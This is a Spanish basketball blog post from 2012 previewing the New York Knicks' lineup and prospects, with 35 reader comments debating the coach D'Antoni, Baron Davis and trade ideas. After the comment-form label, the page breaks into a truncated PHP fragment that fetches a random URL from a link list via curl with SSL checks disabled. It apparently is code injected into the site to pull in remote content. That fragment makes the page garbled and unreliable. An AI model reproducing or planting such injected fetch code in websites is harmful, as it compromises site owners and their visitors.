New York Knicks: Encajando piezas

05 de January de 2012 por Viva_Dirk

Después de 9 años de continuos desastres los aficionados de la ‘Gran Manzana’ vieron a su equipo acabar la temporada con balance positivo. Generalmente, un 42-40 no es para celebrar nada pero si tenemos en cuenta las 32 victorias que promediaban desde las salidas del equipo de Patrick Ewing primero y Houston & Sprewell después, lo del año pasado es un oasis en el desierto. Ahora ya con Carmelo Anthony desde el inicio en la plantilla y el flamante fichaje de Tyson Chandler esperan vivir permanentemente en dicho oasis. Los objetivos de esta reducida regular season deben ser convertirse en uno de los 4 mejores equipos del Este, encontrar una dinámica ganadora e ir puliendo los defectos mientras se van conjuntando todas las piezas, ya que con los 3 megacontratos que tienen firmados su capacidad de movimientos en el mercado es muy limitada.

La posición de base será para Baron Davis, el cual fue fichado tras amnistiar a Chauncey Billups. No podrán disfrutar del veterano base como pronto hasta finales del mes de enero y hay muchísimas dudas respecto a su rendimiento. Una buena versión daría un salto enorme a las posibilidades del equipo ya que las cualidades de Davis son perfectas para el juego rápido de D’Antoni y muy compatibles con las estrellas del equipo. De Mike Bibby, base suplente, ya no se puede esperar gran cosa visto su rendimiento en Miami.  Toney Douglas y el rookie Iman Sumphert son dos combo guards que pueden ejercer de base, aunque ambos son mucho más anotadores que distribuidores.

La posición de escolta la ocupa una de las grandes sorpresas positivas del curso pasado. Landry Fields se destapó como un complemento ideal para cualquier situación. Gran defensor que además aporta en el apartado reboteador y es realmente fiable desde la larga distancia. De nuevo Douglas y Shumpert aparecen como suplentes.

Carmelo Anthony es, pese al temporadón de Amare el año pasado, el jugador franquicia. Por él traspasaron los Knicks a la mitad de su plantilla y de él se espera que de una vez por todas se convierta en un jugador total, capaz de mirar a la cara a cualquier otro jugador de la liga. Además de números de MVP se le exige liderazgo. Los pocos minutos que no dispute Melo serán para Bill Walker, que aportará intensidad en la segunda unidad.

Amare Stoudemire y Tyson Chandler son la mejor pareja interior de la conferencia. El ala-pívot completó una bestial temporada cuando muchos esperaban un batacazo lejos de Steve Nash. A pesar de que su serie contra Boston fue muy decepcionante no podemos negar que se ha mostrado como uno de los grandes anotadores de la liga y que sus capacidades físicas le permiten defender a casi cualquiera. Lo que habrá que ver con nuestros ojitos es si cuando llegue el momento de la verdad sus cualidades mentales le permiten realmente defender como debe. Chandler fue el bastión interior de los Mavs campeones.Sus números no reflejan la intensidad que transmite en la cancha y que innegablemente contagia a sus compañeros. Apenas promedia un tapón por encuentro pero provoca que se cambien tiros, llega a cada ayuda y cuando está sano es un líder dentro de la cancha. El techo de estos Knicks puede verse reflejado en sus salud, como lo hicieran los Hornets en 2008 o los propios Mavs el año pasado. Como suplentes en el juego interior encontramos a Renaldo Balkmany el rookie Josh Harrellson, insuficiente lo miremos por donde lo miremos a pesar de la intensidad que aportan ambos en cada jugada. De todas maneras, habrá que estar atento a la evolución del rookie.

Así pues tenemos ante nosotros uno de los equipos más atractivos de la liga, con una dosis de talento que permite pensar en todo, con el entrenador más ofensivo de la competición y con capacidades más que suficientes para practicar una buena defensa. Pero parece evidente que a los Knicks les faltan piezas. Han sumado algunas pero salvo que Baron Davis vuelva a ser el de los Warriors y Harrellson sea un buen suplente, habrá momentos en que echarán de menos más profundidad.

Quinteto: Baron Davis, Landry Fields, Carmelo Anthony, Amare Stoudemire, Tyson Chandler.
6º hombre: Toney Douglas

Pronóstico: Semifinales de conferencia.


Comenta

35 comentarios a esta entrada

  1. melo15 dice:
    #1

    Muy de acuerdo contigo Viva, aver si Melo le echa cojones (perdon) y se echa el equipo a las espaldas, y con Stat y Chandler en el juego interior, les falta un suplente interior, yo he pensado en Mbah-Aboute el de los Bucks yLarry Sanders aunque no se como conseguirlos…
    Para mi si cambian de entrenador pueden llegar a Finales de Conferencia pero muy muy justo,.
    The Knicks are back!!!

      Citar

  2. nach dice:
    #2

    El tema D’Antoni es complejo. Fichas a un entrenador que sabes a lo que juega, pero que al mismo tiempo no ha conseguido ganar nada con esa forma de jugar más allá de las simpatías de la gente.
    Fichas a un jugador descomunal que ha demostrado ser capaz de jugar a eso de forma brillante, a eso le sumas un anotador descomunal como Carmelo y el fichaje de un grandísimo defensor y pegamento como Chadler, y luego echas a tu base titular para fichar a otro lesionado, aunque cuya forma de jugar va más hacia el Run&gun que la de Billups. Hasta aquí lo entiendo.

    Ahora, el equipo hasta la vuelta de Davis no va a funcionar, es la pieza clave, pero si vas a jugar a eso, no entiendo el motivo de no fichar a otro base de un perfil similar, es decir, capaz de correr y de asistir a los demás, más allá de su capacidad para anotar, en cambio, con un jugador como Carmelo revientas los principios del run&gun, porque directamente absorve mucho balón y tiempo de posesión, sin meterme en cosas como su lectura o capacidad para asistir porque a fin de cuentas no es base, no es su trabajo.

    No entiendo como la posición clave para hacer ese tipo de juego no tiene un sustituto capaz de, al menos, intentar jugar de ese modo.

      Citar

  3. MagicJohnson32 dice:
    #3

    La esperanza pasa por Baron Davis. Tengo la impresión de que lo va a hacer muy bien, pero ya tiene tela que un proyecto como éste dependa de un jugador pescado tras ser amnistiado y cuya condición física siempre pende de un hilo. No tiene sentido la propuesta de D’Antoni si no se dispone de un jugador capaz de dirigir el juego de contrataque y transición, menos aún cuando tus líderes son jugadores sin rigor táctico ni capacidad de liderazo en defensa.

      Citar

  4. RSB dice:
    #4

    De momento están decepcionando mucho estos Knicks, si todo depende de Baron, están apañados. Ahora mismo son la única alternativa posible en la bipolaridad del este (Miami-Bulls), pero estos equipos son demasiado fuertes para NY.

    Les falta banquillo pero prometen espectáculo.

      Citar

  5. Blade Petrovic dice:
    #5

    Han echado al GRAN Pat Ewing JR que era malo hasta en el 2k=(

      Citar

  6. Blade Petrovic dice:
    #6

    Mbah Moute por Walker alomejor si los bucks estan locos o por douglas lo veo mas factible

      Citar

  7. melo15 dice:
    #7

    Si hombre por Douglas, yo en el 2k lo he hecho por Jeffries y Bibby, un pedazo de fichaje y yambien he fichado a Pietrus

      Citar

  8. Blade Petrovic dice:
    #8

    Jefries es bastante malillo y biby un acabado,buen fichaje pero habras puesto forzar traspaso no?
    Yo si soy los bucks no lo acepto

      Citar

  9. rumbero dice:
    #9

    MagicJohnson32:
    La esperanza pasa por Baron Davis. Tengo la impresión de que lo va a hacer muy bien, pero ya tiene tela que un proyecto como éste dependa de un jugador pescado tras ser amnistiado y cuya condición física siempre pende de un hilo. No tiene sentido la propuesta de D’Antoni si no se dispone de un jugador capaz de dirigir el juego de contrataque y transición, menos aún cuando tus líderes son jugadores sin rigor táctico ni capacidad de liderazo en defensa.

    Amén. No es normal que después de lo que se han gastado en el proyecto (y de los jugadores que han soltado) se lo tengan que fiar todo a Davis.
    También es cierto que se tiende a cebarse en exceso con ellos. Ganaron a los Celtics en el 1r partido y eran candidatos al anillo y ahora parece que no se vayan a clasificar ni para play offs. Ni una cosa ni la otra. No andan finos pero iran a mejor fácilmente ya que buenas piezas no les faltan, pero si como encajarlas. Yo también les doy como techo unas semis de conferencia. Les sobra calidad, pero en partidos a cara de perro contra Miami-Chicago-Boston donde habrá pegarse lo van a tener complicado.

      Citar

  10. Ru dice:
    #10

    Pues como dice MagicJohnson32,si tu proyecto actual depende de un jugador que ya no tiene vítola de estrella,que viene rebotado de los Cavs,lesionado,amnistiado y es nuevo en tu equipo es para decir “apaga y vámonos”.No sé en qué momento se truncó esto,si con el traspaso para obtener a Melo o con D’Antoni,pero yo no sería inmovilista si fuera presidente de operaciones de los Knicks,y me haría con otro entrenador con distinto concepto de juego.

    Otra cosa es el carácter ganador de tios como Stoudemire o Carmelo,indispensable para llegar a una final de conferencia donde tienes a Chicago,Miami o mismamente Boston,donde están viejetes pero no están exentos de calidad y lo que te diferencia con ellos es que gente como Paul Pierce o KG tienen un gen competitivo que en igualdad de condiciones es el factor que desequilibra la balanza en tu contra.

    Al margen de eso,evidentemente les falta banquillo en las posiciones interiores,no así en el backourt que con Shumpert,Douglas o Walker hay material.

    PD.al margen del tema que nos ocupa,alguien sabe de la existencia de alguna página dónde digan los derechos de qué jugadores tienen las franquicias(p.e. derechos de Claver de Portland,de Llul Houston..).Recuerdo que hace un par de años o así si lo había pero no encuentro nada similar.

      Citar

  11. melo15 dice:
    #11

    Nonnonono nada de forzar traspaso me lo aceptaron.

      Citar

  12. amador rivas dice:
    #12

    mal inicio de los knicks pero quien haya visto algun partido, habrá visto que a la que los knicks le meten intensidad defensiva y ofensiva, los parciales son bastante favorables. Shumpert, anotador y intenso, Douglas desde Sacramento está jugando mejor
    este equipo acabará entre el cuarto y el sexto puesto, no tengo dudas

      Citar

  13. r_miller dice:
    #13

    lo qe necessitan es defender un poco corcho!!!!

      Citar

  14. shaggy dice:
    #14

    Para mi el principal problema de los Knics es D´antoni, xq su run&gun es muy atractivo para el publico, muy llamativo para conseguir seguidores pero en los momentos de la verdad o te dejas los coj*** en defensa o no llegas a ningun lado

      Citar

  15. ralage dice:
    #15

    Ahora mismo los Knicks están en uno de los puntos más bajos de la temporada y es fácil ser derrotistas.
    Vamos a la vuelta de Davis y a que se conozcan todos un poco mejor, pero aún así se me hace dificil que lleguen a semis pensando que no serán uno de los 4 mejores en el Este en temporada.

    Por otro lado, a largo plazo, no creo que su proyecto pueda superar al de los Heat o al de Chicago, el contrato de Chandler puede convertirse en un problema.

      Citar

  16. Nacho dice:
    #16

    Heat, Bulls, Celtics, Magic, y seguramente Hawks destrozarían a estos Knicks en una serie. Puede que en RS acaben por delante de alguos de ellos, pero en las eliminatorias caen.
    Y ojo con Orlando, que si mantienen a Howard en Febrero yo no querría cruzármelos en series (a pesar de Van Gundy)

      Citar

  17. shaggy dice:
    #17

    A largo plazo los contratos de Melo, Stat y el firmado a Chandler como dice ragale le van a lastrar muchisimo

      Citar

  18. rumbero dice:
    #18

    Nacho:
    Heat, Bulls, Celtics, Magic, y seguramente Hawks destrozarían a estos Knicks en una serie. Puede que en RS acaben por delante de alguos de ellos, pero en las eliminatorias caen.
    Y ojo con Orlando, que si mantienen a Howard en Febrero yo no querría cruzármelos en series (a pesar de Van Gundy)

    Pues yo veo a los Magic bastante justitos. Anderson y Howard (motivado) dan el callo, el resto depende del día. No apostaría por ellos en un cruce con los Knicks

      Citar

  19. RSB dice:
    #19

    Veo más peligrosos a los Knicks, Celtics, Pacers y Hawks que a estos Magic, por mucho 5-2 que lleven ahora. Solo hay que recordar los playoff del año pasado

      Citar

  20. Jose Luis dice:
    #20

    A mí estos Knicks no me convencen aún, y creo que gran parte de culpa es del entrenador, aunque hay que verlos con Baron Davis. Pero es lo que decía muchos, el presente y futuro de esta franquicia, ¿depende de Baron Davis? puf que mal lo veo. Con lo bien que estarían con Felton, Fields, Gallinari, Stat, Chandler, y en el banco los Douglas, W. Chandler, Mozgov, Jeffries… yo los veo un equipo capaz de defender más y con más estilo de juego. No sé, a mi no me convencen para pasar aún de primera ronda, ni siquiera con Baron Davis.

      Citar

  21. Javijaen dice:
    #21

    Bueno, casi todo el mundo opina de forma racional.
    Aquí llega lo mío: discrepo con el análisis solo en Harrellson, que me parece un rookie muy completo para suplir a Stoudemire en el segundo equipo.
    Por el resto, Melo debe ser el jugador franquicia. Digo “debe” porque de vez en cuando desaparece demasiados minutos en anotación. Iman Shumpert puede evolucionar para ser el tirador clave, a la vez que base titular hasta que llegue Davis, del cual no espero una dirección estilo Rondo.
    De Douglas, el darle el puesto titular de base creo que no es acertado, ya que es demasiado “metralleta”. Este puesto es el más débil, ya que Bibby está regular y hace falta una dirección aceptable. De Waker-Balkman-Novak-Jordan-Lin… mejor no opino.
    Y finalmente, el señor D´Antoni, que es difícil de asumir. La falta de táctica y rigor defensivo permite que todos los equipos (véase Warriors-Raptors-Bobcats, que no son equipos postemporada) realicen unos ataques sencillos pero efectivos. Esto sería aceptable en cierta medida si los ataques fueran fluidos, pero son ultra-estáticos (si se me permite el superlativo), jugándose muchos tiros de 3 sin siquira un hombre bajo el aro para pelear el rebote, aunque los rebotes ofensivos del último partido engañen.
    Pienso sinceramente que este grupo de jugadores puede llegar a pelear por el cuarto puesto de conferencia (ya que Heat y Bulls los veo un punto por encima), pero este entrenador, que no cae mal, no vale para aburrir el Madison de esta forma.
    Resumiendo: cambio de entrenador – confianza en Shumpert-Harrellson – mayor liderazgo de Melo – cambio de estilo de juego con rigor defensivo y dinamismo ataque… (el resto de milagros a Lourdes)…

      Citar

  22. Javijaen dice:
    #22

    Por cierto, la fotito de Fields ya podía haber sido de esta temporada… jejeje

      Citar

  23. melo15 dice:
    #23

    Tios mas liderazgo a Melo? Si lo esta dando todo, que lleva 30 puntos por partido (ya se que no todo son estadisticas) pero contra los celtics metio muchos en el ultimo cuarto, al igual que con los raptors, y se lo esta currando en defensa

      Citar

  24. Sancho88 dice:
    #24

    lo de celtics fue el subidón del estreno. ese equipo estaba hipermotivado, y lo de toronto fue un lapsus defensivo en el último cuarto y que Bargnani se borró en ese partido. Yo sigo reiterándome, no se puede juzgar a este equipo hasta que no llegue Baron Davis y ponga sus posaderas sobre la mesa. Todo equipo que quiera aspirar a algo tiene que tener un líder veterano. Yo creo que Davis impone a sus compañeros, les enseña, les calma. Ya se le ha visto en algunos partidos ‘cogiendo de la pechera’ a sus compañeros en la banda, y diciéndoles lo que tienen que hacer. De verdad, confiad en él. Hay muchos bases que son como el buen vino, que con los años mejoran. Davis es uno de ellos. Para mí, está en el mejor momento de su carrera al menos en algo muy importante en un base: comprensión y lectura de juego y liderazgo. Esto solo les pasa a los bases que durante su carrera se dedican a más cosas que solo a hacer sus estadísticas. En la otra cara de la moneda tenemos a Bibby, un tío que era ofensivamente la caña en su etapa de los Kings, pero que está claro que no aprendió nada de nada a llevar un equipo. Incluso el propio Derek Fisher, con más tacos a su espalda, ha sabido ser fundamental en momentos muy chungos para ganar su cuarto y quinto pedrolo con L.A., y si vemos las plantillas de los equipos campeones, siempre encontramos un base veterano de esas características. Sam Casell en los Celtics de 2008, Derek Fisher en 2009 y 2010, y Jason Kidd en Dallas la pasada temporada. Yo no digo que sea imopsible ganar esta liga sin tener ese tipo de jugador en el plantel, pero por ejemplo, decidme si alguien cree en los Thunder como aspirantes reales al título con Westbrook como base. Yo definitivamente, no. Y el base te da un poco la receta del equipo, te dice de qué está hecho y hasta donde puede llegar. Por tanto, esperad a Davis, y ahí veremos quiénes son estos enigmáticos Knicks

      Citar

  25. Vader dice:
    #25

    Hace dias que tenia pendiente postear aquí, en el análisis de mi equipo, pero no he tenido tiempo hasta hoy. De entrada os digo que el artículo me parece muy acertado. Ahí van mis ideas al respecto, para ordenarlas mejor haré un “Puntos negativos” vs “Puntos positivos” y después terminaré con un comentario final;

    Puntos negativos

    – Ya no hay flexibilidad salarial, este año sólo queda por gastar una mid-level de 2,5 millones. Se antoja clave la decisión sobre donde gastarla porque el equipo aún tiene varios agujeros que cubrir. Han sonado Kenyon Martin y Wilson Chandler pero parece díficil que este último pudiera firmar por tan poco dinero.

    – Los contratos de Stat y Melo son muy onerosos. Si no rinden los dos a su máximo nivel el traspaso de Stat será inevitable.

    – Poca profunidad, sobretodo en el juego interior y en el puesto de base. A día de hoy el nivel al que esta Baron Davis es una incognita, y estamos hablando de un puesto totalmente clave para el sistema.

    – Dudas sobre si la dirección deportiva es la adecuada. ¿Se puede realmente aspirar al anillo con el run&gun? ¿O mejor dicho, se puede aspirar al anillo con el run&gun sin tener a Steve Nash, CP3 o Deron Williams?

    – De momento las dos piezas ofensivas más importantes, Melo y Stat, no parecen haber encajado bien. Da la impresión que a cada uno de ellos les favorece una forma de jugar que no es la mejor para el otro. ¿Es un problema del entrenador o realmente son dos piezas que no encajan?

    Puntos positivos

    – El fichaje de Stat fue el principio, pero el fichaje de Melo pone a los Knicks en un estatus que no tenian desde la retirada de P.Ewing. Melo es uno de los mejores jugadores de la liga, es un jugador franquicia sobre el que se puede construir alrededor de él un equipo campeón. Leí una estadística que decia que Melo y Kobe son los dos mejores jugadores de la liga creandose sus propios tiros. Por delante de Rose, Durant, Lebron, Wade, etc…

    – Con el fichaje de Tyson Chandler se potencia la defensa por delante del ataque, se potencia la altura y la intensidad por delante de la velocidad o la calidad. Lo pongo como algo muy bueno porque un equipo campeón necesita eso, intensidad, defensa, altura, etc…

    – Las últimas elecciones del draft han sido un acierto y parece que este año tambien se ha tenido buen ojo. Douglas y Fields, y este año Shumpert y Harrellson que sobretodo el primero tiene una pinta estupenda. Venia con fama de ser un excelente defensor de perímetro con un gran físico y ya ha demostrado que tambien puede anotar. Por lo menos la posición de 2 esta muy bien cubierta.

    – Aunque sean contratos altos y que algunos equipos no querrían asumir… llegado el caso se puede dar una vuelta de tuerca al proyecto traspasando a Stat o Chandler. Son dos jugadores de primer nivel y muy apetecibles para muchos equipos.

    Bien creo que no me dejo nada. Sobretodo insistir en lo que ya he dicho en algun comentario anterior, hasta que Baron Davis vuelva y lleve unas semanas jugando con el equipo no podremos valorar del todo al equipo. Porque aún siendo un jugador amnistiado lo ha sido por una causa muy particular de darle todos los minutos a Irving. Si Baron Davis vuelve sano tiene “sólo” 32 años, puede perfectamente ser un revulsivo de primer nivel para el equipo porque calidad tiene a raudales y no creo que se le haya olvidado jugar. Veremos.

    Saludos a todos y go Knicks!!! 😀

      Citar

  26. melo15 dice:
    #26

    Vader, en que equipos crees tu que podria ser traspasado Stat.
    Contestadme los demas si teneis ideas

      Citar

  27. amador rivas dice:
    #27

    crece el rumor que van gundy(ex de los knicks) podria sustituir a woodson como asistente, sin duda seria bastante importante

      Citar

  28. Ru dice:
    #28

    Señoras y señores,rumores de traspaso que implican a Stoudemire para conseguir a Dwight Howard!!!!

      Citar

  29. Vader dice:
    #29

    melo15:
    Vader, en que equipos crees tu que podria ser traspasado Stat.
    Contestadme los demas si teneis ideas

    Sinceramente Melo, ahora mismo no lo se. Pero un jugador como Stat siempre puede ser apeticible para muchos equipos. Te podria hacer una lista de 4 o 5 y quizás a media temporada son 4 o 5 totalmente diferentes los que podrian estar interesados.

    Saludos

      Citar

  30. melo15 dice:
    #30

    Stat por Dwight i Chandler por un ala pivot

      Citar

  31. Blade Petrovic dice:
    #31

    Melo stat por dwight lo veo chungo

      Citar

  32. Txusma dice:
    #32

    melo15:
    Stat por Dwight i Chandler por un ala pivot

    La verdad es que teniendo en cuenta que Howard se puede ir gratis al acabar la temporada, cualquier traspaso es posible.

      Citar

  33. Vader dice:
    #33

    melo15:
    Vader, en que equipos crees tu que podria ser traspasado Stat.
    Contestadme los demas si teneis ideas

    Mira Melo, otro que se me ocurre fácil. Si la cosa pinta mal para los Nets durante la temporada y piensan que Deron no va a renovar igual les interesa un Deron por Stat antes de quedarse sin nada…

      Citar

  34. melo15 dice:
    #34

    si entonce te quedas sin ala-pivot amenos que hagas stat y davis por deron i humphries

      Citar

  35. Vader dice:
    #35

    melo15:
    si entonce te quedas sin ala-pivot amenos que hagas stat y davis por deron i humphries

    O traspasas a Tyson Chandler por un ala-pivot… Posibilidades hay mil y seguro que no acertamos nada…

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>